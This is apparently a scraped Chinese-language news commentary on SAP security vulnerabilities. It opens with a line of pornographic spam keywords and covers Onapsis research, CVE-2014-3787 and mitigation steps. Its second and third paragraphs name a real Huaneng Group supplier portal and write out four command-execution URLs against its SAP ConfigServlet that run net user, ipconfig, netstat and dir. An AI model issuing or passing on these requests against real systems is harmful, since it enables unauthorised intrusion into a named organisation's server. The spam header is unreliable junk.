久久一级毛片高清在线观看_亚洲欧美偷拍综合图区_日本久久久久久中文字幕_国产精品人人爽人人爽AV_国产亚洲日韩一区二区三区

在前些年我們不太注重企業(yè)管理的安全，但是隨著斯諾登事件的爆發(fā)，國(guó)家開(kāi)始對(duì)安全可控進(jìn)行重新定義，安全問(wèn)題一夜之間成為全民熱議的焦點(diǎn)，作為全球知名的管理軟件廠商SAP，卻在系統(tǒng)上安全漏洞不斷。

上個(gè)月SAP系統(tǒng)又出事兒，一安全博客爆出，中國(guó)華能集團(tuán)公司電子商務(wù)網(wǎng)站系統(tǒng)存在漏洞，訪問(wèn)url：http://srm.chng.com.cn/HnSrmWebO/index.jsp，該網(wǎng)站采用sap系統(tǒng)，由于未及時(shí)更新補(bǔ)丁，導(dǎo)致存在命令執(zhí)行漏洞，如下

構(gòu)造語(yǔ)句可查看網(wǎng)站服務(wù)器上的系統(tǒng)用戶賬號(hào)信息：http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20net%20user

查看服務(wù)器ip地址信息

http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20ipconfig%20/all

查看服務(wù)器上端口開(kāi)放信息：http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20netstat%20-an

查看系統(tǒng)磁盤上目錄文件信息：

http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20dir%20c:

全球95%的SAP企業(yè)管理系統(tǒng)存在安全漏洞可能導(dǎo)致嚴(yán)重的數(shù)據(jù)泄露

根據(jù)Onapsis的調(diào)查報(bào)告，全世界超過(guò)25萬(wàn)企業(yè)因SAP系統(tǒng)中存在的一系列安全漏洞而受到影響，可能導(dǎo)致嚴(yán)重的企業(yè)數(shù)據(jù)泄露。SAP是世界上最受歡迎的企業(yè)應(yīng)用軟件企業(yè)和解決方案提供商，為85%以上的全球500強(qiáng)企業(yè)和190個(gè)國(guó)家的282,000+家客戶提供解決方案。

漏洞原因

最近在對(duì)SAP解決方案提供商進(jìn)行的一項(xiàng)研究顯示，超過(guò)95%的企業(yè)SAP存在嚴(yán)重的安全問(wèn)題，這些問(wèn)題將它們置于網(wǎng)絡(luò)攻擊風(fēng)險(xiǎn)之中并可能導(dǎo)致嚴(yán)重的數(shù)據(jù)泄露。影響包括98%的100個(gè)最有價(jià)值的品牌在內(nèi)，全世界超過(guò)250000個(gè)SAP業(yè)務(wù)客戶都因SAP系統(tǒng)中的一系列漏洞而暴露在網(wǎng)絡(luò)攻擊之下。

Onapsis首席執(zhí)行官M(fèi)ariano Nunez說(shuō)：

“最令人驚訝的是，因?yàn)镾AP操作團(tuán)隊(duì)和IT安全團(tuán)隊(duì)之間的責(zé)任差距，大多數(shù)公司的SAP網(wǎng)絡(luò)安全都面臨著威脅。事實(shí)上，應(yīng)用的大多數(shù)補(bǔ)丁都與安全無(wú)關(guān)、發(fā)布過(guò)遲或者引入了進(jìn)一步的操作風(fēng)險(xiǎn)。”

該研究還報(bào)告說(shuō)，在2014年SAP發(fā)布了391個(gè)安全補(bǔ)丁，而它們中的50%以上都被評(píng)定為高風(fēng)險(xiǎn)漏洞。

攻擊方式及影響范圍

針對(duì)SAP應(yīng)用程序的主要網(wǎng)絡(luò)攻擊(也就是系統(tǒng)弱點(diǎn))分為以下幾類：

1. 核心網(wǎng)絡(luò)：執(zhí)行遠(yuǎn)程功能的模塊。

2. 數(shù)據(jù)倉(cāng)庫(kù)：為了獲取或修改SAP數(shù)據(jù)庫(kù)中的信息，利用SAP RFC網(wǎng)關(guān)中的漏洞執(zhí)行管理員權(quán)限指令。

3. 門戶網(wǎng)站攻擊：利用漏洞創(chuàng)建J2EE后門賬戶，以訪問(wèn)SAP門戶和其他內(nèi)部系統(tǒng)。

報(bào)告中提供了針對(duì)SAP系統(tǒng)最常見(jiàn)的三種網(wǎng)絡(luò)攻擊的細(xì)節(jié)信息，這些攻擊向量使得黑客可以入侵SAP系統(tǒng)并能夠訪問(wèn)公司數(shù)據(jù)的應(yīng)用程序。經(jīng)過(guò)專家研究確認(rèn)，網(wǎng)絡(luò)攻擊將會(huì)嚴(yán)重影響以下關(guān)鍵業(yè)務(wù)進(jìn)程：

1. 在SAP系統(tǒng)之間使用Pivoting，造成客戶信息和信用卡信息泄漏。

2. 客戶和供應(yīng)商門戶攻擊。

3. 通過(guò)SAP私有協(xié)議對(duì)數(shù)據(jù)倉(cāng)庫(kù)發(fā)起攻擊。

根據(jù)Nunez所說(shuō)，SAP HANA應(yīng)該對(duì)新增加的450%的安全補(bǔ)丁負(fù)責(zé)：

“這一趨勢(shì)不僅僅是持續(xù)的，而是隨著SAP HANA更加惡化，因?yàn)镾AP HANA導(dǎo)致新的安全補(bǔ)丁增加了450%。因?yàn)镾AP HANA位于SAP生態(tài)系統(tǒng)的中心，所以存儲(chǔ)在SAP平臺(tái)的數(shù)據(jù)現(xiàn)在必須同時(shí)在云端和前端進(jìn)行保護(hù)。”

安全措施

該報(bào)告還提供了以下行動(dòng)計(jì)劃，用以提高SAP系統(tǒng)的安全級(jí)別：

1. 獲取基于SAP資產(chǎn)的可視化功能，以確定“風(fēng)險(xiǎn)價(jià)值”。

2. 通過(guò)持續(xù)監(jiān)控以防止安全性和遵從性問(wèn)題。

3. 檢測(cè)并應(yīng)對(duì)新威脅、攻擊或用戶異常表現(xiàn)作為攻擊的指示器。

為了保護(hù)SAP軟件，遵循任何SAP安全記錄和監(jiān)控內(nèi)部體系結(jié)構(gòu)非常重要，這能夠有效預(yù)防一些安全問(wèn)題。

而SAP存在安全問(wèn)題并非今天就有，在2013年SAP就被俄羅斯安全研究人員爆出Netweaver漏洞導(dǎo)致用戶表泄露，該漏洞可能導(dǎo)致攻擊者獲取中央用戶管理表的訪問(wèn)權(quán)。

作為一套面向服務(wù)的集成平臺(tái)方案，SAP NetWeaver此次遭遇的漏洞細(xì)節(jié)(CVE-2014-3787)由安全企業(yè)PT Security公司嚴(yán)格保密，這家安全廠商會(huì)定期對(duì)SAP套件進(jìn)行檢測(cè)。

中央用戶管理功能旨在簡(jiǎn)化對(duì)由不同客戶端托管的多個(gè)用戶賬戶的管理流程。SAP公司是目前人氣最高的商務(wù)應(yīng)用程序供應(yīng)商之一，財(cái)富五百?gòu)?qiáng)企業(yè)中有四分之三使用該公司的產(chǎn)品。

Dmitry Gutsko指出，此次曝光的敏感信息泄露漏洞會(huì)影響到NetWeaver 7.20以及更早版本。

“一旦成功利用此漏洞，攻擊者將能夠通過(guò)附屬系統(tǒng)讀取來(lái)自SAP中央用戶管理體系中的任何表信息，這可能會(huì)導(dǎo)致存儲(chǔ)在全部CUA系統(tǒng)中的用戶數(shù)據(jù)遭到泄露，”Gutso在一篇博文中解釋道。

建議用戶利用最新發(fā)布的NetWeaver安全補(bǔ)丁來(lái)修復(fù)這一漏洞。

SAP用戶一直對(duì)該公司部署方案的更新與安全保護(hù)機(jī)制抱怨不休。去年ERP Scan公司創(chuàng)始人Alexander Polyakov曾經(jīng)發(fā)現(xiàn)，當(dāng)時(shí)成百上千家企業(yè)在運(yùn)行著存在漏洞的陳舊SAP產(chǎn)品版本，而且內(nèi)部信息完全暴露在公共互聯(lián)網(wǎng)之下。

Polyakov發(fā)現(xiàn)不少客戶所運(yùn)行的NetWeaver j2EE版本當(dāng)中都包含關(guān)鍵性漏洞，可能允許攻擊者在無(wú)需認(rèn)證的前提下執(zhí)行操作命令。

另外這家安全公司還報(bào)告稱SAP NetWeaver的GRMGApp中存在關(guān)鍵性XML External Entity(簡(jiǎn)稱XXE)漏洞，這相當(dāng)于為未經(jīng)授權(quán)的訪問(wèn)敞開(kāi)了便利之門。

而在此時(shí)不斷爆出安全問(wèn)題，對(duì)于SAP在企業(yè)選擇會(huì)受到一定影響，特別是在去IOE行動(dòng)從概念走向落地的當(dāng)下，SAP不能只有價(jià)格最高，在安全防范上也在配得起他高大上的價(jià)格才行。